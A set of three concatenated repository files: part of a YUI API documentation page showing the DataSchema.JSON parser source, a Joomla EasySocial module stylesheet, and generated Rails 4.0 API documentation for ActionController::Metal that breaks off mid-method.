// Note price was converted from a numeric string to a number
// response.results[0] looks like { fruit: "BANANA", price: 1.96 }
@method apply
@param {Object} [schema] Schema to apply. Supported configuration
properties are:
@param {String} [schema.resultListLocator] Path locator for the
location of the array of records to flatten into `response.results`
@param {Array} [schema.resultFields] Field identifiers to
locate/assign values in the response records. See above for
details.
@param {Array} [schema.metaFields] Path locators to extract extra
non-record related information from the data object.
@param {Object|Array|String} data JSON data or its string serialization.
@return {Object} An Object with properties `results` and `meta`
@static
**/
apply: function(schema, data) {
var data_in = data,
data_out = { results: [], meta: {} };
// Convert incoming JSON strings
if (!isObject(data)) {
try {
data_in = Y.JSON.parse(data);
}
catch(e) {
data_out.error = e;
return data_out;
}
}
if (isObject(data_in) && schema) {
// Parse results data
data_out = SchemaJSON._parseResults.call(this, schema, data_in, data_out);
// Parse meta data
if (schema.metaFields !== undefined) {
data_out = SchemaJSON._parseMeta(schema.metaFields, data_in, data_out);
}
}
else {
Y.log("JSON data could not be schema-parsed: " + Y.dump(data) + " " + Y.dump(data), "error", "dataschema-json");
data_out.error = new Error("JSON schema parse failure");
}
return data_out;
},
/**
* Schema-parsed list of results from full data
*
* @method _parseResults
* @param schema {Object} Schema to parse against.
* @param json_in {Object} JSON to parse.
* @param data_out {Object} In-progress parsed data to update.
* @return {Object} Parsed data object.
* @static
* @protected
*/
_parseResults: function(schema, json_in, data_out) {
var getPath = SchemaJSON.getPath,
getValue = SchemaJSON.getLocationValue,
path = getPath(schema.resultListLocator),
results = path ?
(getValue(path, json_in) ||
// Fall back to treat resultListLocator as a simple key
json_in[schema.resultListLocator]) :
// Or if no resultListLocator is supplied, use the input
json_in;
if (isArray(results)) {
// if no result fields are passed in, then just take
// the results array whole-hog Sometimes you're getting
// an array of strings, or want the whole object, so
// resultFields don't make sense.
if (isArray(schema.resultFields)) {
data_out = SchemaJSON._getFieldValues.call(this, schema.resultFields, results, data_out);
} else {
data_out.results = results;
}
} else if (schema.resultListLocator) {
data_out.results = [];
data_out.error = new Error("JSON results retrieval failure");
Y.log("JSON data could not be parsed: " + Y.dump(json_in), "error", "dataschema-json");
}
return data_out;
},
/**
* Get field data values out of list of full results
*
* @method _getFieldValues
* @param fields {Array} Fields to find.
* @param array_in {Array} Results to parse.
* @param data_out {Object} In-progress parsed data to update.
* @return {Object} Parsed data object.
* @static
* @protected
*/
_getFieldValues: function(fields, array_in, data_out) {
var results = [],
len = fields.length,
i, j,
field, key, locator, path, parser, val,
simplePaths = [], complexPaths = [], fieldParsers = [],
result, record;
// First collect hashes of simple paths, complex paths, and parsers
for (i=0; i<len; i++) {
field = fields[i]; // A field can be a simple string or a hash
key = field.key || field; // Find the key
locator = field.locator || key; // Find the locator
// Validate and store locators for later
path = SchemaJSON.getPath(locator);
if (path) {
if (path.length === 1) {
simplePaths.push({
key : key,
path: path[0]
});
} else {
complexPaths.push({
key : key,
path : path,
locator: locator
});
}
} else {
Y.log("Invalid key syntax: " + key, "warn", "dataschema-json");
}
// Validate and store parsers for later
//TODO: use Y.DataSchema.parse?
parser = (isFunction(field.parser)) ?
field.parser :
Y.Parsers[field.parser + ''];
if (parser) {
fieldParsers.push({
key : key,
parser: parser
});
}
}
// Traverse list of array_in, creating records of simple fields,
// complex fields, and applying parsers as necessary
for (i=array_in.length-1; i>=0; --i) {
record = {};
result = array_in[i];
if(result) {
// Cycle through complexLocators
for (j=complexPaths.length - 1; j>=0; --j) {
path = complexPaths[j];
val = SchemaJSON.getLocationValue(path.path, result);
if (val === undefined) {
val = SchemaJSON.getLocationValue([path.locator], result);
// Fail over keys like "foo.bar" from nested parsing
// to single token parsing if a value is found in
// results["foo.bar"]
if (val !== undefined) {
simplePaths.push({
key: path.key,
path: path.locator
});
// Don't try to process the path as complex
// for further results
complexPaths.splice(i,1);
continue;
}
}
record[path.key] = Base.parse.call(this,
(SchemaJSON.getLocationValue(path.path, result)), path);
}
// Cycle through simpleLocators
for (j = simplePaths.length - 1; j >= 0; --j) {
path = simplePaths[j];
// Bug 1777850: The result might be an array instead of object
record[path.key] = Base.parse.call(this,
((result[path.path] === undefined) ?
result[j] : result[path.path]), path);
}
// Cycle through fieldParsers
for (j=fieldParsers.length-1; j>=0; --j) {
key = fieldParsers[j].key;
record[key] = fieldParsers[j].parser.call(this, record[key]);
// Safety net
if (record[key] === undefined) {
record[key] = null;
}
}
results[i] = record;
}
}
data_out.results = results;
return data_out;
},
/**
* Parses results data according to schema
*
* @method _parseMeta
* @param metaFields {Object} Metafields definitions.
* @param json_in {Object} JSON to parse.
* @param data_out {Object} In-progress parsed data to update.
* @return {Object} Schema-parsed meta data.
* @static
* @protected
*/
_parseMeta: function(metaFields, json_in, data_out) {
if (isObject(metaFields)) {
var key, path;
for(key in metaFields) {
if (metaFields.hasOwnProperty(key)) {
path = SchemaJSON.getPath(metaFields[key]);
if (path && json_in) {
data_out.meta[key] = SchemaJSON.getLocationValue(path, json_in);
}
}
}
}
else {
data_out.error = new Error("JSON meta data retrieval failure");
}
return data_out;
}
};
// TODO: Y.Object + mix() might be better here
Y.DataSchema.JSON = Y.mix(SchemaJSON, Base);
</pre>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="../assets/vendor/prettify/prettify-min.js"></script>
<script>prettyPrint();</script>
<script src="../assets/js/yui-prettify.js"></script>
<script src="../assets/../api.js"></script>
<script src="../assets/js/api-filter.js"></script>
<script src="../assets/js/api-list.js"></script>
<script src="../assets/js/api-search.js"></script>
<script src="../assets/js/apidocs.js"></script>
</body>
</html>
|
modules/mod_community_hellome/style.css | Creativetech-Solutions/joomla-easysocial-network | .joms-module__body .joms-module--hellome {
margin: -14px;
}
.joms-module--hellome .joms-hcard {
width: 100%;
border: 0;
}
.joms-list--hellome li span {
display: table-cell;
width: 40px;
text-align: right;
}
.joms-module--hellome .joms-list--hellome li {
padding: 8px 14px;
border-bottom:1px solid rgba(0,0,0,0.04);
display: table;
width: 100%;
}
.joms-module--hellome .joms-list--hellome li:last-child {
border-bottom: 0;
}
.joms-action--hellome {
display:table;
width:100%;
table-layout: fixed;
border-spacing:1px;
}
.joms-action--hellome > div {
display:table-cell;
}
.joms-button--hellome {
display:block;
background: rgba(0,0,0,0.04);
text-align: center;
padding: 8px;
text-decoration: none;
}
.joms-button--hellome:hover {
background: rgba(0,0,0,0.02);
text-decoration: none;
}
.joms-button--hellome.logout {
background: #e74c3c;
}
|
doc/api/classes/ActionController/Metal.html | aaronfi/chess-es6-demo | <?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>ActionController::Metal</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" href="../../css/reset.css" type="text/css" media="screen" />
<link rel="stylesheet" href="../../css/main.css" type="text/css" media="screen" />
<link rel="stylesheet" href="../../css/github.css" type="text/css" media="screen" />
<script src="../../js/jquery-1.3.2.min.js" type="text/javascript" charset="utf-8"></script>
<script src="../../js/jquery-effect.js" type="text/javascript" charset="utf-8"></script>
<script src="../../js/main.js" type="text/javascript" charset="utf-8"></script>
<script src="../../js/highlight.pack.js" type="text/javascript" charset="utf-8"></script>
</head>
<body>
<div class="banner">
<span>Ruby on Rails 4.0.0</span><br />
<h1>
<span class="type">Class</span>
ActionController::Metal
<span class="parent"><
<a href="../AbstractController/Base.html">AbstractController::Base</a>
</span>
</h1>
<ul class="files">
<li><a href="../../files/Users/aaron/_rvm/gems/ruby-2_0_0-head/gems/actionpack-4_0_0/lib/action_controller/metal_rb.html">/Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb</a></li>
</ul>
</div>
<div id="bodyContent">
<div id="content">
<div class="description">
<p><code>ActionController::Metal</code> is the simplest possible controller,
providing a valid Rack interface without the additional niceties provided
by <code>ActionController::Base</code>.</p>
<p>A sample metal controller might look like this:</p>
<pre class="ruby"><span class="ruby-keyword">class</span> <span class="ruby-constant">HelloController</span> <span class="ruby-operator"><</span> <span class="ruby-constant">ActionController</span><span class="ruby-operator">::</span><span class="ruby-constant">Metal</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">index</span>
<span class="ruby-keyword">self</span>.<span class="ruby-identifier">response_body</span> = <span class="ruby-string">"Hello World!"</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
</pre>
<p>And then to route requests to your metal controller, you would add
something like this to <code>config/routes.rb</code>:</p>
<pre>get 'hello', to: HelloController.action(:index)</pre>
<p>The <code>action</code> method returns a valid Rack application for the
Rails router to dispatch to.</p>
<h2 id="label-Rendering+Helpers"><a href="Rendering.html">Rendering</a> <a href="Helpers.html">Helpers</a></h2>
<p><code>ActionController::Metal</code> by default provides no utilities for
rendering views, partials, or other responses aside from explicitly calling
of <code>response_body=</code>, <code>content_type=</code>, and
<code>status=</code>. To add the render helpers you're used to having
in a normal controller, you can do the following:</p>
<pre class="ruby"><span class="ruby-keyword">class</span> <span class="ruby-constant">HelloController</span> <span class="ruby-operator"><</span> <span class="ruby-constant">ActionController</span><span class="ruby-operator">::</span><span class="ruby-constant">Metal</span>
<span class="ruby-identifier">include</span> <span class="ruby-constant">ActionController</span><span class="ruby-operator">::</span><span class="ruby-constant">Rendering</span>
<span class="ruby-identifier">append_view_path</span> <span class="ruby-node">"#{Rails.root}/app/views"</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">index</span>
<span class="ruby-identifier">render</span> <span class="ruby-string">"hello/index"</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
</pre>
<h2 id="label-Redirection+Helpers">Redirection <a href="Helpers.html">Helpers</a></h2>
<p>To add redirection helpers to your metal controller, do the following:</p>
<pre class="ruby"><span class="ruby-keyword">class</span> <span class="ruby-constant">HelloController</span> <span class="ruby-operator"><</span> <span class="ruby-constant">ActionController</span><span class="ruby-operator">::</span><span class="ruby-constant">Metal</span>
<span class="ruby-identifier">include</span> <span class="ruby-constant">ActionController</span><span class="ruby-operator">::</span><span class="ruby-constant">Redirecting</span>
<span class="ruby-identifier">include</span> <span class="ruby-constant">Rails</span>.<span class="ruby-identifier">application</span>.<span class="ruby-identifier">routes</span>.<span class="ruby-identifier">url_helpers</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">index</span>
<span class="ruby-identifier">redirect_to</span> <span class="ruby-identifier">root_url</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
</pre>
<h2 id="label-Other+Helpers">Other <a href="Helpers.html">Helpers</a></h2>
<p>You can refer to the modules included in
<code>ActionController::Base</code> to see other features you can bring
into your metal controller.</p>
</div>
<!-- Method ref -->
<div class="sectiontitle">Methods</div>
<dl class="methods">
<dt>A</dt>
<dd>
<ul>
<li>
<a href="#method-c-action">action</a>
</li>
</ul>
</dd>
<dt>C</dt>
<dd>
<ul>
<li>
<a href="#method-c-call">call</a>,
</li>
<li>
<a href="#method-i-content_type">content_type</a>,
</li>
<li>
<a href="#method-i-content_type-3D">content_type=</a>,
</li>
<li>
<a href="#method-c-controller_name">controller_name</a>,
</li>
<li>
<a href="#method-i-controller_name">controller_name</a>
</li>
</ul>
</dd>
<dt>E</dt>
<dd>
<ul>
<li>
<a href="#method-i-env">env</a>
</li>
</ul>
</dd>
<dt>L</dt>
<dd>
<ul>
<li>
<a href="#method-i-location">location</a>,
</li>
<li>
<a href="#method-i-location-3D">location=</a>
</li>
</ul>
</dd>
<dt>M</dt>
<dd>
<ul>
<li>
<a href="#method-c-middleware">middleware</a>
</li>
</ul>
</dd>
<dt>N</dt>
<dd>
<ul>
<li>
<a href="#method-c-new">new</a>
</li>
</ul>
</dd>
<dt>P</dt>
<dd>
<ul>
<li>
<a href="#method-i-params">params</a>,
</li>
<li>
<a href="#method-i-params-3D">params=</a>,
</li>
<li>
<a href="#method-i-performed-3F">performed?</a>
</li>
</ul>
</dd>
<dt>R</dt>
<dd>
<ul>
<li>
<a href="#method-i-response_body-3D">response_body=</a>
</li>
</ul>
</dd>
<dt>S</dt>
<dd>
<ul>
<li>
<a href="#method-i-status">status</a>,
</li>
<li>
<a href="#method-i-status-3D">status=</a>
</li>
</ul>
</dd>
<dt>U</dt>
<dd>
<ul>
<li>
<a href="#method-i-url_for">url_for</a>,
</li>
<li>
<a href="#method-c-use">use</a>
</li>
</ul>
</dd>
</dl>
<!-- Methods -->
<div class="sectiontitle">Class Public methods</div>
<div class="method">
<div class="title method-title" id="method-c-action">
<b>action</b>(name, klass = ActionDispatch::Request)
<a href="../../classes/ActionController/Metal.html#method-c-action" name="method-c-action" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns a Rack endpoint for the given action name.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-c-action_source')" id="l_method-c-action_source">show</a>
</p>
<div id="method-c-action_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 229</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">self</span>.<span class="ruby-identifier">action</span>(<span class="ruby-identifier">name</span>, <span class="ruby-identifier">klass</span> = <span class="ruby-constant">ActionDispatch</span><span class="ruby-operator">::</span><span class="ruby-constant">Request</span>)
<span class="ruby-identifier">middleware_stack</span>.<span class="ruby-identifier">build</span>(<span class="ruby-identifier">name</span>.<span class="ruby-identifier">to_s</span>) <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">env</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">new</span>.<span class="ruby-identifier">dispatch</span>(<span class="ruby-identifier">name</span>, <span class="ruby-identifier">klass</span>.<span class="ruby-identifier">new</span>(<span class="ruby-identifier">env</span>))
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-c-call">
<b>call</b>(env)
<a href="../../classes/ActionController/Metal.html#method-c-call" name="method-c-call" class="permalink">Link</a>
</div>
<div class="description">
<p>Makes the controller a Rack endpoint that runs the action in the given
<code>env</code>'s <code>action_dispatch.request.path_parameters</code>
key.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-c-call_source')" id="l_method-c-call_source">show</a>
</p>
<div id="method-c-call_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 224</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">self</span>.<span class="ruby-identifier">call</span>(<span class="ruby-identifier">env</span>)
<span class="ruby-identifier">action</span>(<span class="ruby-identifier">env</span>[<span class="ruby-string">'action_dispatch.request.path_parameters'</span>][<span class="ruby-value">:action</span>]).<span class="ruby-identifier">call</span>(<span class="ruby-identifier">env</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-c-controller_name">
<b>controller_name</b>()
<a href="../../classes/ActionController/Metal.html#method-c-controller_name" name="method-c-controller_name" class="permalink">Link</a>
</div>
<div class="description">
<p>Returns the last part of the controller's name, underscored, without
the ending <code>Controller</code>. For instance, PostsController returns
<code>posts</code>. Namespaces are left out, so Admin::PostsController
returns <code>posts</code> as well.</p>
<h4 id="method-c-controller_name-label-Returns">Returns</h4>
<ul><li>
<p><code>string</code></p>
</li></ul>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-c-controller_name_source')" id="l_method-c-controller_name_source">show</a>
</p>
<div id="method-c-controller_name_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 114</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">self</span>.<span class="ruby-identifier">controller_name</span>
<span class="ruby-ivar">@controller_name</span> <span class="ruby-operator">||=</span> <span class="ruby-identifier">name</span>.<span class="ruby-identifier">demodulize</span>.<span class="ruby-identifier">sub</span>(<span class="ruby-regexp">/Controller$/</span>, <span class="ruby-string">''</span>).<span class="ruby-identifier">underscore</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-c-middleware">
<b>middleware</b>()
<a href="../../classes/ActionController/Metal.html#method-c-middleware" name="method-c-middleware" class="permalink">Link</a>
</div>
<div class="description">
<p>Alias for <code>middleware_stack</code>.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-c-middleware_source')" id="l_method-c-middleware_source">show</a>
</p>
<div id="method-c-middleware_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 218</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">self</span>.<span class="ruby-identifier">middleware</span>
<span class="ruby-identifier">middleware_stack</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-c-new">
<b>new</b>()
<a href="../../classes/ActionController/Metal.html#method-c-new" name="method-c-new" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-c-new_source')" id="l_method-c-new_source">show</a>
</p>
<div id="method-c-new_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 132</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">initialize</span>
<span class="ruby-ivar">@_headers</span> = {<span class="ruby-string">"Content-Type"</span> =<span class="ruby-operator">></span> <span class="ruby-string">"text/html"</span>}
<span class="ruby-ivar">@_status</span> = <span class="ruby-number">200</span>
<span class="ruby-ivar">@_request</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-ivar">@_response</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-ivar">@_routes</span> = <span class="ruby-keyword">nil</span>
<span class="ruby-keyword">super</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-c-use">
<b>use</b>(*args, &block)
<a href="../../classes/ActionController/Metal.html#method-c-use" name="method-c-use" class="permalink">Link</a>
</div>
<div class="description">
<p>Pushes the given Rack middleware and its arguments to the bottom of the
middleware stack.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-c-use_source')" id="l_method-c-use_source">show</a>
</p>
<div id="method-c-use_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 213</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">self</span>.<span class="ruby-identifier">use</span>(*<span class="ruby-identifier">args</span>, &<span class="ruby-identifier">block</span>)
<span class="ruby-identifier">middleware_stack</span>.<span class="ruby-identifier">use</span>(*<span class="ruby-identifier">args</span>, &<span class="ruby-identifier">block</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="sectiontitle">Instance Public methods</div>
<div class="method">
<div class="title method-title" id="method-i-content_type">
<b>content_type</b>()
<a href="../../classes/ActionController/Metal.html#method-i-content_type" name="method-i-content_type" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-content_type_source')" id="l_method-i-content_type_source">show</a>
</p>
<div id="method-i-content_type_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 157</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">content_type</span>
<span class="ruby-identifier">headers</span>[<span class="ruby-string">"Content-Type"</span>]
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-content_type-3D">
<b>content_type=</b>(type)
<a href="../../classes/ActionController/Metal.html#method-i-content_type-3D" name="method-i-content_type-3D" class="permalink">Link</a>
</div>
<div class="description">
<p>Basic implementations for <a
href="Metal.html#method-i-content_type">#content_type</a>=, location=, and
headers are provided to reduce the dependency on the <a
href="RackDelegation.html">RackDelegation</a> module in Renderer and
Redirector.</p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-content_type-3D_source')" id="l_method-i-content_type-3D_source">show</a>
</p>
<div id="method-i-content_type-3D_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 153</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">content_type=</span>(<span class="ruby-identifier">type</span>)
<span class="ruby-identifier">headers</span>[<span class="ruby-string">"Content-Type"</span>] = <span class="ruby-identifier">type</span>.<span class="ruby-identifier">to_s</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-controller_name">
<b>controller_name</b>()
<a href="../../classes/ActionController/Metal.html#method-i-controller_name" name="method-i-controller_name" class="permalink">Link</a>
</div>
<div class="description">
<p>Delegates to the class' <code>controller_name</code></p>
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-controller_name_source')" id="l_method-i-controller_name_source">show</a>
</p>
<div id="method-i-controller_name_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 119</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">controller_name</span>
<span class="ruby-keyword">self</span>.<span class="ruby-identifier">class</span>.<span class="ruby-identifier">controller_name</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-env">
<b>env</b>()
<a href="../../classes/ActionController/Metal.html#method-i-env" name="method-i-env" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-env_source')" id="l_method-i-env_source">show</a>
</p>
<div id="method-i-env_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 104</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">env</span>
<span class="ruby-ivar">@_env</span> <span class="ruby-operator">||=</span> {}
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-location">
<b>location</b>()
<a href="../../classes/ActionController/Metal.html#method-i-location" name="method-i-location" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-location_source')" id="l_method-i-location_source">show</a>
</p>
<div id="method-i-location_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 161</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">location</span>
<span class="ruby-identifier">headers</span>[<span class="ruby-string">"Location"</span>]
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-location-3D">
<b>location=</b>(url)
<a href="../../classes/ActionController/Metal.html#method-i-location-3D" name="method-i-location-3D" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-location-3D_source')" id="l_method-i-location-3D_source">show</a>
</p>
<div id="method-i-location-3D_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 165</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">location=</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-identifier">headers</span>[<span class="ruby-string">"Location"</span>] = <span class="ruby-identifier">url</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-params">
<b>params</b>()
<a href="../../classes/ActionController/Metal.html#method-i-params" name="method-i-params" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-params_source')" id="l_method-i-params_source">show</a>
</p>
<div id="method-i-params_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 141</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">params</span>
<span class="ruby-ivar">@_params</span> <span class="ruby-operator">||=</span> <span class="ruby-identifier">request</span>.<span class="ruby-identifier">parameters</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-params-3D">
<b>params=</b>(val)
<a href="../../classes/ActionController/Metal.html#method-i-params-3D" name="method-i-params-3D" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-params-3D_source')" id="l_method-i-params-3D_source">show</a>
</p>
<div id="method-i-params-3D_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 145</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">params=</span>(<span class="ruby-identifier">val</span>)
<span class="ruby-ivar">@_params</span> = <span class="ruby-identifier">val</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-performed-3F">
<b>performed?</b>()
<a href="../../classes/ActionController/Metal.html#method-i-performed-3F" name="method-i-performed-3F" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-performed-3F_source')" id="l_method-i-performed-3F_source">show</a>
</p>
<div id="method-i-performed-3F_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 187</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">performed?</span>
<span class="ruby-identifier">response_body</span> <span class="ruby-operator">||</span> (<span class="ruby-identifier">response</span> <span class="ruby-operator">&&</span> <span class="ruby-identifier">response</span>.<span class="ruby-identifier">committed?</span>)
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-response_body-3D">
<b>response_body=</b>(body)
<a href="../../classes/ActionController/Metal.html#method-i-response_body-3D" name="method-i-response_body-3D" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-response_body-3D_source')" id="l_method-i-response_body-3D_source">show</a>
</p>
<div id="method-i-response_body-3D_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 182</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">response_body=</span>(<span class="ruby-identifier">body</span>)
<span class="ruby-identifier">body</span> = [<span class="ruby-identifier">body</span>] <span class="ruby-keyword">unless</span> <span class="ruby-identifier">body</span>.<span class="ruby-identifier">nil?</span> <span class="ruby-operator">||</span> <span class="ruby-identifier">body</span>.<span class="ruby-identifier">respond_to?</span>(<span class="ruby-value">:each</span>)
<span class="ruby-keyword">super</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-status">
<b>status</b>()
<a href="../../classes/ActionController/Metal.html#method-i-status" name="method-i-status" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-status_source')" id="l_method-i-status_source">show</a>
</p>
<div id="method-i-status_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 174</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">status</span>
<span class="ruby-ivar">@_status</span>
<span class="ruby-keyword">end</span></pre>
</div>
</div>
</div>
<div class="method">
<div class="title method-title" id="method-i-status-3D">
<b>status=</b>(status)
<a href="../../classes/ActionController/Metal.html#method-i-status-3D" name="method-i-status-3D" class="permalink">Link</a>
</div>
<div class="description">
</div>
<div class="sourcecode">
<p class="source-link">
Source:
<a href="javascript:toggleSource('method-i-status-3D_source')" id="l_method-i-status-3D_source">show</a>
</p>
<div id="method-i-status-3D_source" class="dyn-source">
<pre><span class="ruby-comment"># File /Users/aaron/.rvm/gems/ruby-2.0.0-head/gems/actionpack-4.0.0/lib/action_controller/metal.rb, line 178</span>
<span class="ruby-keyword">def</span> <span class="ruby-keyword ruby-title">status=</span>(<span class="ruby-identifier">status</span>)
